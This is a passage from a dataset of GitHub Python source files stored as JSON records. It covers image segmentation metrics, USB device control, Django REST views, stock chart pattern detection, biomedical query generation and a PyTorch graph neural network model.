multimediali\\database_sclere\\maschere_tesiInglese OS\"\n\n# Ottieni la lista dei file nelle due cartelle\nfile_cartella1 = os.listdir(cartella1)\nfile_cartella2 = os.listdir(cartella2)\n\n# Verifica che le due cartelle abbiano lo stesso numero di file\nif len(file_cartella1) != len(file_cartella2):\n print(\"Le cartelle non contengono lo stesso numero di file.\")\n exit()\n\n# Cicla tra i file delle due cartelle in parallelo\nfor file1, file2 in zip(file_cartella1, file_cartella2):\n i+=1\n percorso_file1 = os.path.join(cartella1, file1)\n percorso_file2 = os.path.join(cartella2, file2)\n\n maschera1 = cv2.imread(percorso_file1, cv2.IMREAD_GRAYSCALE)\n maschera2 = cv2.imread(percorso_file2, cv2.IMREAD_GRAYSCALE)\n\n # Verifica se le maschere sono state caricate correttamente\n if maschera1 is None or maschera2 is None:\n print(\"Impossibile caricare le maschere.\")\n 
exit()\n\n # Converti le maschere in array di booleani\n maschera1 = maschera1.astype(bool)\n maschera2 = maschera2.astype(bool)\n\n veri_positivi += np.sum(np.logical_and(maschera1, maschera2))\n falsi_positivi += np.sum(np.logical_and(maschera1, ~maschera2))\n veri_negativi += np.sum(np.logical_and(~maschera1, ~maschera2))\n falsi_negativi += np.sum(np.logical_and(~maschera1, maschera2))\n\n# Stampa i risultati\nprint(\"Veri positivi:\", veri_positivi)\nprint(\"Falsi positivi:\", falsi_positivi)\nprint(\"Veri negativi:\", veri_negativi)\nprint(\"Falsi negativi:\", falsi_negativi)\n\nprecision, recall, f1_score, accuracy = calcola_metriche(veri_positivi, falsi_positivi, falsi_negativi, veri_negativi)\n\n# Stampa i risultati\nprint(\"Precision:\", precision)\nprint(\"Recall:\", recall)\nprint(\"F1-score:\", f1_score)\nprint(\"Accuracy:\", accuracy)\nprint(\"Immagini analizzate:\", i)","repo_name":"sakab01/mask","sub_path":"segmentation_score.py","file_name":"segmentation_score.py","file_ext":"py","file_size_in_byte":2568,"program_lang":"python","lang":"it","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"9998850119","text":"#!/usr/bin/env python2.6\nimport sys\nimport os\nos.environ[\"DYLD_LIBRARY_PATH\"] = \"/Users/qdot/git-projects/library/usr_darwin_10.5_x86/lib/\"\nsys.path.append('/Users/qdot/git-projects/library/usr_darwin_10.5_x86/lib/python2.6/site-packages')\nimport usb\nimport time\nfrom contextlib import *\n\nclass TranceVibrator():\n #Device as retreived from the bus listing\n trancevibe_device = None\n #Handle to access the device with\n trancevibe_handle = None\n\n TRANCEVIBE_VENDOR_ID = 0x0b49\n TRANCEVIBE_PRODUCT_ID = 0x064f\n\n #Constructor\n def __init__(self):\n return\n\n @classmethod\n def create(cls, index = 0):\n t = TranceVibrator()\n t.open(index)\n return t\n\n def open(self, index = 0):\n \"\"\" Given an index, opens the related ambx device. The index refers\n to the position of the device on the USB bus. 
Index 0 is default, \n and will open the first device found.\n\n Returns True if open successful, False otherwise.\n \"\"\"\n self.trancevibe_device = usb.core.find(idVendor = self.TRANCEVIBE_VENDOR_ID, \n idProduct = self.TRANCEVIBE_PRODUCT_ID)\n if self.trancevibe_device is None:\n return False\n return True\n \n @contextmanager\n def close(self):\n \"\"\"Closes the trancevibe device currently held by the object, \n if it is open.\"\"\"\n if self.trancevibe_device is not None:\n self.trancevibe_device = None\n\n def set_speed(self, speed):\n self.trancevibe_device.ctrl_transfer(\n usb.ENDPOINT_OUT | usb.TYPE_VENDOR | usb.RECIP_INTERFACE,\n 1,\n speed,\n 0,\n []\n )\n\ndef main(argv=None):\n with closing(TranceVibrator.create()) as tv:\n tv.set_speed(255)\n time.sleep(0.5)\n tv.set_speed(0)\n \nif __name__ == \"__main__\":\n \n sys.exit(main())\n\n","repo_name":"qdot/deldo","sub_path":"trancevibe.py","file_name":"trancevibe.py","file_ext":"py","file_size_in_byte":1928,"program_lang":"python","lang":"en","doc_type":"code","stars":185,"dataset":"github-code","pt":"67"} +{"seq_id":"42954973483","text":"def build_encoder(config, drop_path_allocator,\n dim, num_heads, mlp_ratio, qkv_bias, drop_rate, attn_drop_rate,\n z_shape, x_shape):\n encoder_config = config['transformer']['encoder']\n encoder_type = encoder_config['type']\n\n if encoder_type == 'concatenation_feature_fusion':\n from .concatenated_fusion.builder import build_concatenated_fusion_encoder\n return build_concatenated_fusion_encoder(config, drop_path_allocator,\n dim, num_heads, mlp_ratio, qkv_bias, drop_rate, attn_drop_rate,\n z_shape, x_shape)\n elif encoder_type == 'cross_attention_feature_fusion':\n from .cross_attention_fusion.builder import build_cross_attention_based_encoder\n return build_cross_attention_based_encoder(config, drop_path_allocator,\n dim, num_heads, mlp_ratio, qkv_bias, drop_rate, attn_drop_rate,\n z_shape, x_shape)\n else:\n raise NotImplementedError(encoder_type)\n","repo_name":"LitingLin/SwinTrack","sub_path":"models/methods/SwinTrack/modules/encoder/builder.py","file_name":"builder.py","file_ext":"py","file_size_in_byte":1128,"program_lang":"python","lang":"en","doc_type":"code","stars":224,"dataset":"github-code","pt":"67"} +{"seq_id":"16451320697","text":"from ntpath import join\r\nfrom colors import *\r\nclass Picture:\r\n def __init__(self, img):\r\n self.img = img;\r\n\r\n def __eq__(self, other):\r\n return self.img == other.img\r\n\r\n def _invColor(self, color):\r\n if color not in inverter:\r\n return color\r\n return inverter[color]\r\n\r\n def verticalMirror(self):\r\n \"\"\" Devuelve el espejo vertical de la imagen \"\"\"\r\n new = []\r\n num = len(self.img) - 1\r\n while (num >= 0):\r\n new.append(self.img[num])\r\n num = num - 1\r\n return new\r\n\r\n def horizontalMirror(self):\r\n \"\"\" Devuelve el espejo horizontal de la imagen \"\"\"\r\n new = []\r\n num = 0\r\n for x in self.img:\r\n str = self.img[num]\r\n reversed = []\r\n i = len(str)\r\n while i > 0: \r\n reversed += str[i-1]\r\n i = i - 1\r\n num = num + 1\r\n str = \"\".join(reversed)\r\n new.append(str)\r\n return new\r\n\r\n def negative(self):\r\n \"\"\" Devuelve un negativo de la imagen \"\"\"\r\n return Picture(None)\r\n\r\n def join(self, p):\r\n \"\"\" Devuelve una nueva figura poniendo la figura del argumento \r\n al lado derecho de la figura actual \"\"\"\r\n new = []\r\n num = 0\r\n for x in self.img:\r\n new.append(self.img[num])\r\n new[num] = new[num] + p.img[num] \r\n num = num + 1\r\n return new\r\n\r\n def 
up(self, p):\r\n \"\"\" Devuelve una nueva figura poniendo la figura p debajo de la\r\n figura actual \"\"\"\r\n return Picture(None)\r\n\r\n def under(self, p):\r\n \"\"\" Devuelve una nueva figura poniendo la figura p sobre la\r\n figura actual \"\"\"\r\n return Picture(None)\r\n \r\n def horizontalRepeat(self, n):\r\n \"\"\" Devuelve una nueva figura repitiendo la figura actual al costado\r\n la cantidad de veces que indique el valor de n \"\"\"\r\n new = []\r\n num = 0\r\n for x in self.img:\r\n new.append(self.img[num])\r\n iter = 0\r\n while(iter < n-1):\r\n new[num] = new[num] + self.img[num] \r\n iter = iter +1\r\n num = num + 1\r\n return new\r\n\r\n def verticalRepeat(self, n):\r\n \"\"\" Devuelve una nueva figura repitiendo la figura actual por debajo de\r\n la cantidad de veces que indique el valor de n \"\"\"\r\n new = []\r\n iter = 0\r\n while(iter < n):\r\n num = 0\r\n for x in self.img:\r\n new.append(self.img[num])\r\n num = num + 1\r\n iter = iter + 1\r\n return new\r\n\r\n #Extra: Sólo para realmente viciosos \r\n def rotate(self):\r\n \"\"\"Devuelve una figura rotada en 90 grados, puede ser en sentido horario\r\n o antihorario\"\"\"\r\n return Picture(None)\r\n\r\n","repo_name":"JRodriguezOc/lab04","sub_path":"lab/chess_work/picture.py","file_name":"picture.py","file_ext":"py","file_size_in_byte":2524,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"1838721667","text":"import requests\n\nfrom environs import Env\n\nenv = Env()\n\n\ndef send_help_message(sender_id, message):\n params = {'access_token': env('PAGE_ACCESS_TOKEN')}\n headers = {'Content-Type': 'application/json'}\n text = f'Невозможно распознать команду {message}. Для начала нажмите старт'\n request_content = {\n 'recipient': {\n 'id': sender_id\n },\n 'message': {\n 'attachment': {\n 'type': 'template',\n 'payload': {\n 'template_type': 'button',\n 'text': text,\n 'buttons': [{ \n 'type': 'postback', \n 'title': 'start', \n 'payload': '/start'\n }] \n }\n }\n }\n }\n url = 'https://graph.facebook.com/v2.6/me/messages'\n response = requests.post(url, params=params, headers=headers, json=request_content)\n response.raise_for_status()","repo_name":"HkerVit/pizza-bot","sub_path":"fb_help_message.py","file_name":"fb_help_message.py","file_ext":"py","file_size_in_byte":1106,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"3293726458","text":"\n'''\n 单根K线构成的形态的检测器\n'''\n'''\n # 锤子线\n # 流星形态\n'''\nclass SingleKLineFormChecker(object):\n __instance = None\n def __new__(cls, *args, **kwargs):\n if not cls.__instance:\n cls.__instance = super().__new__(cls, *args, **kwargs)\n return cls.__instance\n\n # 锤子线\n def hammerWire(self, day:list):\n open, high, close, low = day[0:4]\n entity_len = abs(open - close) # K线实体\n upper_shadow_len = high - open if open > close else high - close\n lower_shadow_len = open - low if open < close else close - low\n '''\n - 长下影线\n - 无上影线\n '''\n if lower_shadow_len > 2 * entity_len and upper_shadow_len == 0: # 严格没有上影线\n if open > close:\n return 0x000 # 顶部绿锤子线\n elif open < close:\n return 0x001 # 底部红锤子线\n return -1\n\n # 流星形态\n ## 流星形态的高位看跌比低位看涨要强烈!!!\n def meteorForm(self, day:list):\n open, high, close, low = day[0:4]\n entity_len = abs(open - close) # K线实体\n lower_shadow_len = open - low if open < close else close - low\n '''\n - 实体较小\n - 长上影线\n - 颜色不重要\n '''\n if (abs(high - open) > 2 * entity_len or abs(high - close) > 2 * entity_len) \\\n and lower_shadow_len 
== 0: # 严格没有下影线\n return 0x002\n return -1\n\n # 倒锤子形态\n def invertedHammerWire(self, day: list):\n open, high, close, low = day[0:4]\n entity_len = abs(open - close) # K线实体\n lower_shadow_len = open - low if open < close else close - low\n max_v = max(open, close)\n '''\n - 实体较小\n - 长上影线\n - 颜色不重要\n - 第二天是一根阳线,并且阳线 开盘价 >= 第一天实体的最大值\n '''\n if abs(high - max_v) >= entity_len \\\n and lower_shadow_len == 0: # 严格无下影线\n return 0x104\n return -1\n\nif __name__ == '__main__':\n import pandas as pd\n from src.analysis_department.StockForms import StockForms\n\n stockMap = {\n \"000524\": \"岭南控股\",\n \"002108\": \"沧州明珠\",\n \"002138\": \"顺络电子\",\n \"002625\": \"光启技术\",\n \"603703\": \"盛洋科技\",\n \"600988\": \"赤峰黄金\",\n \"000503\": \"国新健康\",\n \"300316\": \"晶盛机电\",\n \"300376\": \"易事特\",\n \"300424\": \"航新科技\",\n \"300494\": \"盛天网络\"\n }\n\n for id in stockMap.keys():\n df = pd.read_excel('../../datas/股票数据/' + id + stockMap[id] + '.xlsx', sheet_name='历史日K数据', parse_dates=True)\n print('-----------------------------: ' + id + stockMap[id])\n\n for i in range(0, len(df)):\n line_lst = list(df.iloc[i])\n date, open, high, close, low = line_lst[0:5]\n day = [open, high, close, low]\n res = SingleKLineFormChecker().hammerWire(day)\n if res != -1:\n print(\"====>: \" + date + \": \" + StockForms().get(res), end=\"\")\n print('===========================================\\n')","repo_name":"woaijssss/stock_analysis","sub_path":"technology/src/stock_forms/SingleKLineFormChecker.py","file_name":"SingleKLineFormChecker.py","file_ext":"py","file_size_in_byte":3337,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"67"} +{"seq_id":"21497785054","text":"\r\nfrom rest_framework.decorators import api_view, permission_classes, authentication_classes\r\nfrom rest_framework.permissions import IsAuthenticated\r\nfrom rest_framework.response import Response\r\nfrom rest_framework import status\r\n\r\nfrom ..serializers import CompanySerializer, CompanySerializer2, VacancySerializer, VacancySerializer2\r\nfrom ..models import Company, Vacancy\r\n\r\n\r\n@api_view(['GET', 'POST'])\r\n@permission_classes([IsAuthenticated])\r\ndef all_companies(request):\r\n if request.method == 'GET':\r\n companies = Company.objects.all() # [ companies - это QuerySet ]\r\n serializer = CompanySerializer(companies, many=True)\r\n return Response(serializer.data)\r\n\r\n elif request.method == 'POST':\r\n serializer = CompanySerializer(data=request.data)\r\n if serializer.is_valid():\r\n serializer.save()\r\n return Response(serializer.data, status=status.HTTP_201_CREATED)\r\n return Response(serializer.errors, status=status.HTTP_500_INTERNAL_SERVER_ERROR)\r\n\r\n\r\n@api_view(['GET', 'PUT', 'DELETE'])\r\n@permission_classes([IsAuthenticated])\r\ndef one_company(request, company_id):\r\n try:\r\n company = Company.objects.get(id=company_id)\r\n except Company.DoesNotExist as e:\r\n return Response({'error': str(e)})\r\n\r\n if request.method == 'GET':\r\n serializer = CompanySerializer(company)\r\n return Response(serializer.data)\r\n\r\n elif request.method == 'PUT':\r\n serializer = CompanySerializer(instance=company, data=request.data)\r\n if serializer.is_valid():\r\n serializer.save()\r\n return Response(serializer.data)\r\n return Response({'error': serializer.errors})\r\n\r\n elif request.method == 'DELETE':\r\n company.delete()\r\n return Response({'Deleted': True})\r\n\r\n\r\n@api_view(['GET'])\r\n@permission_classes([IsAuthenticated])\r\ndef all_vacancies_by_company(request, 
company_id):\r\n if request.method == 'GET':\r\n try:\r\n company = Company.objects.get(id=company_id)\r\n except Company.DoesNotExist as e:\r\n return Response({'error': 'company does not exists []'})\r\n\r\n vacancies = company.vacancy_set.all()\r\n\r\n if vacancies.__len__() == 0:\r\n return Response({'info': 'qazir bul [company] boyinsha [vacancies] JO-O-O-Q'})\r\n else:\r\n serializer = VacancySerializer2(vacancies, many=True)\r\n return Response(serializer.data)\r\n\r\n\r\n@api_view(['GET', 'POST'])\r\n@permission_classes([IsAuthenticated])\r\ndef all_vacancies(request):\r\n if request.method == 'GET':\r\n vacancies = Vacancy.objects.all()\r\n serializer = VacancySerializer2(vacancies, many=True)\r\n return Response(serializer.data)\r\n\r\n elif request.method == 'POST':\r\n serializer = VacancySerializer2(data=request.data)\r\n if serializer.is_valid():\r\n serializer.save()\r\n return Response(serializer.data, status=status.HTTP_201_CREATED)\r\n return Response({'error': serializer.errors}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)\r\n\r\n\r\n@api_view(['GET', 'PUT', 'DELETE'])\r\n@permission_classes([IsAuthenticated])\r\ndef one_vacancy(request, vacancy_id):\r\n try:\r\n vacancy = Vacancy.objects.get(id=vacancy_id)\r\n except Vacancy.DoesNotExist as e:\r\n return Response({'error': 'vacancy does not exists'})\r\n\r\n if request.method == 'GET':\r\n serializer = VacancySerializer2(vacancy)\r\n return Response(serializer.data)\r\n\r\n elif request.method == 'PUT':\r\n serializer = VacancySerializer2(instance=vacancy, data=request.data)\r\n if serializer.is_valid():\r\n serializer.save()\r\n return Response(serializer.data)\r\n return Response({'error': serializer.errors})\r\n\r\n elif request.method == 'DELETE':\r\n vacancy.delete()\r\n return Response({'Deleted': True})\r\n\r\n\r\n@api_view(['GET'])\r\ndef top_ten_vacancies(request):\r\n if request.method == 'GET':\r\n top_vacancies = Vacancy.objects.order_by('-salary')[0:10]\r\n serializer = VacancySerializer2(top_vacancies, many=True)\r\n return Response(serializer.data)\r\n","repo_name":"Pazyl/WED101","sub_path":"lab10/demo/api/views/views_fbv.py","file_name":"views_fbv.py","file_ext":"py","file_size_in_byte":4168,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"13243667998","text":"\"\"\" Simple script for generating TRAPI query samples.\n\"\"\"\n\nimport json\n\nfrom chp_client.query import build_query\n\n\ndef make_standard_probablistic_query_one_gene():\n \"\"\" Build a standard probablistic query with one gene and one drug.\n \"\"\"\n query = build_query(\n genes=[\"ENSEMBL:ENSG00000141510\"],\n therapeutic=\"CHEMBL:CHEMBL88\",\n disease=\"MONDO:0007254\",\n outcome=(\"EFO:0000714\", \">=\", 500)\n )\n \n with open('standard_one_gene.json', 'w') as f_:\n json.dump(query, f_) \n\ndef make_standard_probablistic_query_two_gene():\n \"\"\" Build a standard probablistic query with two genes and one drug.\n \"\"\"\n query = build_query(\n genes=[\"ENSEMBL:ENSG00000121879\", \"ENSEMBL:ENSG00000155657\"],\n therapeutic=\"CHEMBL:CHEMBL88\",\n disease=\"MONDO:0007254\",\n outcome=(\"EFO:0000714\", \">=\", 500)\n )\n \n with open('standard_two_gene.json', 'w') as f_:\n json.dump(query, f_) \n\ndef make_gene_wildcard_query():\n \"\"\" Builds a gene wildcard query\n \"\"\"\n query = build_query(\n therapeutic=\"CHEMBL:CHEMBL88\",\n disease=\"MONDO:0007254\",\n outcome=(\"EFO:0000714\", \">=\", 500),\n num_gene_wildcards=1,\n )\n\n with open('gene_wildcard.json', 'w') as 
f_:\n json.dump(query, f_) \n\ndef make_drug_wildcard_query():\n for i in [1,2,5,10]:\n query = build_query(\n genes=[\"ENSEMBL:ENSG00000012048\"],\n disease=\"MONDO:0007254\",\n outcome=(\"EFO:0000714\", \">=\", 365*i),\n therapeutic_wildcard=True,\n )\n\n with open('dw_brac1_{}yr.json'.format(i), 'w') as f_:\n json.dump(query, f_)\n\ndef make_one_hop_query():\n query = build_query(\n genes=[\"ENSEMBL:ENSG00000121879\"],\n therapeutic_wildcard=True,\n one_hop=True,\n )\n\n with open('one_hop.json', 'w') as f_:\n json.dump(query, f_)\n\ndef main():\n #make_standard_probablistic_query_one_gene()\n #make_standard_probablistic_query_two_gene()\n #make_gene_wildcard_query()\n make_drug_wildcard_query()\n #make_one_hop_query()\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"di2ag/chp_client","sub_path":"samples/generate_samples.py","file_name":"generate_samples.py","file_ext":"py","file_size_in_byte":2248,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"42674067606","text":"\"\"\"\n@author: grapesh@gmail.com\n\"\"\"\n\nimport os, csv, shutil, glob\nimport tarfile\nimport numpy as np\nfrom datetime import datetime\nfrom csdllib import oper\n\n#==============================================================================\ndef findLatestCycle (dirMask):\n \n dirs = glob.glob(dirMask+'*')\n latestDir = max(dirs, key=os.path.getctime) \n D = os.path.basename(latestDir).split('.')[-1]\n\n files = glob.glob(latestDir + '/*.csv_tar')\n latestFile = max(files)\n\n F = os.path.basename(latestFile)\n latestCycle = D + F[F.find('.t')+2:F.find('z.')]\n\n return latestCycle\n \n#==============================================================================\ndef readStations (tarFile, verbose=1):\n \"\"\"\n Reads content of tar file into the list of stations\n \"\"\" \n if verbose:\n oper.sys.msg('i', 'Reading ' + tarFile)\n if not os.path.exists (tarFile):\n oper.sys.msg('e', 'File ' + tarFile + ' is not found. Exiting.')\n return\n \n stations = []\n tar = tarfile.open(tarFile, \"r:*\")\n tmpDir = os.path.join(os.getcwd(),'tmp')\n try:\n shutil.rmtree(tmpDir)\n except:\n pass \n os.mkdir(tmpDir)\n for member in tar.getmembers():\n if member.isreg(): # skip if the TarInfo is not files\n member.name = os.path.basename(member.name)\n tar.extract(member, tmpDir) # extract\n stations.append( readStation( os.path.join(tmpDir, member.name)) )\n tar.close()\n shutil.rmtree(tmpDir)\n \n return stations\n\n#==============================================================================\ndef readStation (csvFile, verbose=1):\n \"\"\"\n Reads one station data from csvFile\n Returns lists of dates and corresponding time series values\n Skips obs\n \"\"\"\n if verbose:\n oper.sys.msg( 'i','Reading ' + csvFile)\n if not os.path.exists (csvFile):\n oper.sys.msg( 'e','File ' + csvFile + ' is not found. 
Exiting.')\n return\n\n nosid = os.path.splitext(os.path.basename(csvFile))[0]\n missingVal = 9999.\n dtime = []\n tide = []\n surge = []\n bias = []\n twl = []\n with open( csvFile ) as csvfile:\n data = csv.reader(csvfile, delimiter=',')\n next(data, None)\n\n for row in data:\n row = [np.nan if float(x) == missingVal else x for x in row]\n TIME, TIDE, OB, SURGE, BIAS, TWL = row\n if TWL is np.nan:\n pass\n else:\n dtime.append ( datetime.strptime(TIME,'%Y%m%d%H%M') )\n tide.append ( float (TIDE) )\n surge.append ( float(SURGE) )\n bias.append ( float(BIAS) )\n twl.append ( float(TWL) )\n \n return {'time' : dtime, \n 'htp' : tide,\n 'swl' : surge,\n 'cwl' : twl,\n 'bias' : bias,\n 'nosid' : nosid} \n\n ","repo_name":"grapesh/csdllib","sub_path":"csdllib/models/etss.py","file_name":"etss.py","file_ext":"py","file_size_in_byte":2967,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"31669089310","text":"import cv2\r\nimport numpy as np\r\nfrom matplotlib import pyplot as plt\r\n\r\nlsy = cv2.imread(\"D:\\Work\\Image_Processing\\Blog\\py_code\\lee-sung-kyung.jpg\",0)\r\n\r\nplt.subplot(1,4,1),plt.imshow(lsy,cmap = 'gray')\r\nplt.title('original'), plt.xticks([]), plt.yticks([])\r\n\r\nkernel3 = np.ones((3,3),np.float32)/9.0\r\nblur3 = cv2.filter2D(lsy,-1,kernel3)\r\nplt.subplot(1,4,2),plt.imshow(blur3,cmap = 'gray')\r\nplt.title('3x3'), plt.xticks([]), plt.yticks([])\r\n\r\nkernel5 = np.ones((5,5),np.float32)/25.0\r\nblur5 = cv2.filter2D(lsy,-1,kernel5)\r\nplt.subplot(1,4,3),plt.imshow(blur5,cmap = 'gray')\r\nplt.title('5x5'), plt.xticks([]), plt.yticks([])\r\n\r\nkernel7 = np.ones((7,7),np.float32)/49.0\r\nblur7 = cv2.filter2D(lsy,-1,kernel7)\r\nplt.subplot(1,4,4),plt.imshow(blur7,cmap = 'gray')\r\nplt.title('7x7'), plt.xticks([]), plt.yticks([])\r\n\r\nplt.show()","repo_name":"PisitpongW/ImageProcessing","sub_path":"Filter/box.py","file_name":"box.py","file_ext":"py","file_size_in_byte":822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"28082576725","text":"from typing import List\n\ndef contains(item, packages: List[str]):\n for package in packages:\n if not package.__contains__(item):\n return False\n return True\n\ndef find_shared(packages: List[str]):\n assert len(packages) >= 2, \"Must be 2 or more packages\"\n for item in packages[0]:\n if contains(item, packages[1:]):\n return item\n\ndef get_priority(item: str):\n if(item >= \"a\" and item <= \"z\"):\n return ord(item) - 96\n if (item >= \"A\" and item <= \"Z\"):\n return ord(item) - 38\n else:\n assert False, \"Unknown item\"\n\npriorities_part_1 = 0\npriorities_part_2 = 0\nwith open('input.txt') as file:\n group = []\n for rucksack in file.readlines():\n rucksack = rucksack.strip()\n\n # Part 1\n first = rucksack[:int(len(rucksack)/2)]\n second = rucksack[-int(len(rucksack)/2):]\n shared = find_shared([first, second])\n priorities_part_1 += get_priority(shared)\n\n # Part 2\n group.append(rucksack)\n\n if len(group) >= 3:\n shared = find_shared(group)\n priorities_part_2 += get_priority(shared)\n group = []\n\nprint(priorities_part_1)\nprint(priorities_part_2)\n","repo_name":"poschi3/AdventOfCode2022","sub_path":"day03/day03.py","file_name":"day03.py","file_ext":"py","file_size_in_byte":1208,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"8560980492","text":"from copy import Error\r\nimport torch\r\nimport torch.nn as nn\r\nimport 
torch.nn.functional as F\r\nfrom torch.nn import Linear, Dropout\r\n\r\nfrom torch_geometric.nn import SAGEConv, Linear, to_hetero, GATv2Conv\r\nfrom torch.nn import Linear, ReLU, BatchNorm1d\r\nfrom torchmetrics import R2Score\r\n\r\nfrom src.utils import get_sample_weights, correct_negative_edges\r\nfrom src.loss import RBOLoss, pearson_correlation_coefficient, penalize_false_negative, weighted_mean_absolute_error_loss, weighted_mse_loss, weighted_rmse\r\nfrom src.data import get_missing_links, get_singular_edge_indices\r\n\r\n\r\nclass SAGEEncoder(torch.nn.Module):\r\n\tdef __init__(self, hidden_channels, out_channels, num_layers, final_activation, with_linears, in_channels=-1):\r\n\t\tsuper().__init__()\r\n\t\tself.final_activation = final_activation\r\n\r\n\t\tself.convs = torch.nn.ModuleList()\r\n\t\tfor _ in range(num_layers-1):\r\n\t\t\tself.convs.append(SAGEConv((-1, -1), hidden_channels, project=with_linears))\r\n\r\n\t\tself.lastconv = SAGEConv((-1, -1), out_channels, project=with_linears)\r\n\r\n\r\n\tdef forward(self, x, edge_index, edge_attr):\r\n\t\tfor conv in self.convs:\r\n\t\t\tx = conv(x, edge_index)\r\n\t\t\tx = x.relu()\r\n\t\tx = self.lastconv(x, edge_index)\r\n\t\t\r\n\t\tif self.final_activation:\r\n\t\t\tx = x.relu()\r\n\r\n\t\treturn x\r\n\r\n\r\nclass GATEncoder(torch.nn.Module):\r\n\tdef __init__(self, hidden_channels, out_channels, num_layers, final_activation, with_linears, in_channels=-1):\r\n\t\tsuper().__init__()\r\n\t\tself.with_linears = with_linears\r\n\t\tself.final_activation = final_activation\r\n\r\n\t\tself.convs = torch.nn.ModuleList()\r\n\t\tfor _ in range(num_layers-1):\r\n\t\t\t# self.convs.append(GATv2Conv((-1, -1), hidden_channels, add_self_loops=False, edge_dim=1, heads=2, concat=False, dropout=0.2))\r\n\t\t\tself.convs.append(GATv2Conv((-1, -1), hidden_channels, edge_dim=1, add_self_loops=False))\r\n\r\n\t\t# self.lastconv = GATv2Conv((-1, -1), out_channels, add_self_loops=False, edge_dim=1, heads=2, concat=False, dropout=0.2)\r\n\t\tself.lastconv = GATv2Conv((-1, -1), out_channels, edge_dim=1, add_self_loops=False)\r\n\r\n\tdef forward(self, x, edge_index, edge_attr):\r\n\t\tfor conv in self.convs:\r\n\t\t\tx = conv(x, edge_index, edge_attr)\r\n\t\t\tx = x.relu()\r\n\t\tx = self.lastconv(x, edge_index, edge_attr)\r\n\t\t\r\n\t\tif self.final_activation:\r\n\t\t\tx = x.relu()\r\n\t\treturn x\r\n\r\n\r\nclass EdgeDecoder(torch.nn.Module):\r\n\tdef __init__(self, hidden_channels, link_type, final_activation, use_dropout=False, use_batchnorm=False):\r\n\t\tsuper().__init__()\r\n\t\tself.use_dropout = use_dropout\r\n\t\tself.use_batchnorm = use_batchnorm\r\n\r\n\t\tself.lin1 = Linear(2 * hidden_channels, hidden_channels)\r\n\t\tif use_batchnorm:\r\n\t\t\tself.batchnorm1 = BatchNorm1d(hidden_channels)\r\n\t\tif use_dropout:\r\n\t\t\tself.dropout1 = Dropout(0.2)\r\n\t\tself.lin2 = Linear(hidden_channels, 1)\r\n\r\n\t\tself.link_from = link_type[0]\r\n\t\tself.link_to = link_type[1]\r\n\t\tself.final_activation = final_activation\r\n\r\n\tdef forward(self, z_dict, edge_label_index):\r\n\t\trow, col = edge_label_index\r\n\t\tz = torch.cat([z_dict[self.link_from][row], z_dict[self.link_to][col]], dim=-1)\r\n\r\n\t\tz = self.lin1(z)\r\n\t\tif self.use_batchnorm:\r\n\t\t\tz = self.batchnorm1(z)\r\n\t\tz = z.relu()\r\n\t\tif self.use_dropout:\r\n\t\t\tz = self.dropout1(z)\r\n\t\tz = self.lin2(z).relu()\r\n\t\treturn z\r\n\r\n\r\nclass Model(torch.nn.Module):\r\n\tdef __init__(self, hidden_channels, data, metadata, link_type, 
loss_function='cross_entropy', encoder='sage', num_encoding_layers=2, aggregation_operator='mean', final_activation=True, with_linears=False, use_dropout=False):\r\n\t\tsuper().__init__()\r\n\t\tself.encoder_type = encoder\r\n\t\tif encoder == 'sage':\r\n\t\t\tself.encoder = SAGEEncoder(hidden_channels, hidden_channels, num_layers=num_encoding_layers, final_activation=final_activation, with_linears=with_linears)\r\n\t\t\tself.encoder = to_hetero(self.encoder, metadata, aggr=aggregation_operator)\r\n\t\telif encoder == 'gat':\r\n\t\t\tself.encoder = GATEncoder(hidden_channels, hidden_channels, num_layers=num_encoding_layers, final_activation=final_activation, with_linears=with_linears)\r\n\t\t\tself.encoder = to_hetero(self.encoder, metadata, aggr=aggregation_operator)\r\n\t\telse:\r\n\t\t\traise Error(\"Encoder type {} not implemented!\".format(encoder))\r\n\t\tself.decoder = EdgeDecoder(hidden_channels, link_type=link_type, final_activation=final_activation, use_dropout=use_dropout)\r\n\t\tself.loss_function = loss_function\r\n\t\tself.link_from = link_type[0]\r\n\t\tself.link_to = link_type[1]\r\n\r\n\tdef load(self, path):\r\n\t\tself.load_state_dict(torch.load(path))\r\n\t\tself.eval()\r\n\t\treturn self\r\n\t\r\n\tdef save(self, path):\r\n\t\ttorch.save(self.state_dict(), path)\r\n\r\n\tdef forward(self, x_dict, edge_index_dict, edge_label_index, edge_attr_dict):\r\n\t\tz_dict = self.encoder(x_dict, edge_index_dict, edge_attr_dict)\r\n\t\treturn self.decoder(z_dict, edge_label_index)\r\n\t\r\n\tdef inspect(self, data, mode='all'):\r\n\t\tedge_type = (self.link_from, self.link_to)\r\n\t\tif mode == 'train':\r\n\t\t\treturn data[edge_type].y_edge_index[:, data[edge_type].train_idx]\r\n\t\telif mode == 'val':\r\n\t\t\treturn data[edge_type].y_edge_index[:, data[edge_type].val_idx]\r\n\t\telif mode == 'test':\r\n\t\t\treturn data[edge_type].y_edge_index[:, data[edge_type].test_idx]\r\n\t\telif mode == 'all':\r\n\t\t\treturn data[edge_type].y_edge_index\r\n\t\telif mode == 'singular':\r\n\t\t\treturn data[edge_type].y_edge_index[:, get_singular_edge_indices(data, edge_type)]\r\n\t\telif mode == 'missing':\r\n\t\t\treturn get_missing_links(data, edge_type)\r\n\t\telse:\r\n\t\t\traise ValueError(\"GNN inspect(): mode can only be 'train', 'val', 'test' or 'all'\")\r\n\r\n\tdef ground_truth(self, data, mode='all'):\r\n\t\tedge_type = (self.link_from, self.link_to)\r\n\t\tif mode == 'train':\r\n\t\t\treturn data[edge_type].y[data[edge_type].train_idx]\r\n\t\telif mode == 'val':\r\n\t\t\treturn data[edge_type].y[data[edge_type].val_idx]\r\n\t\telif 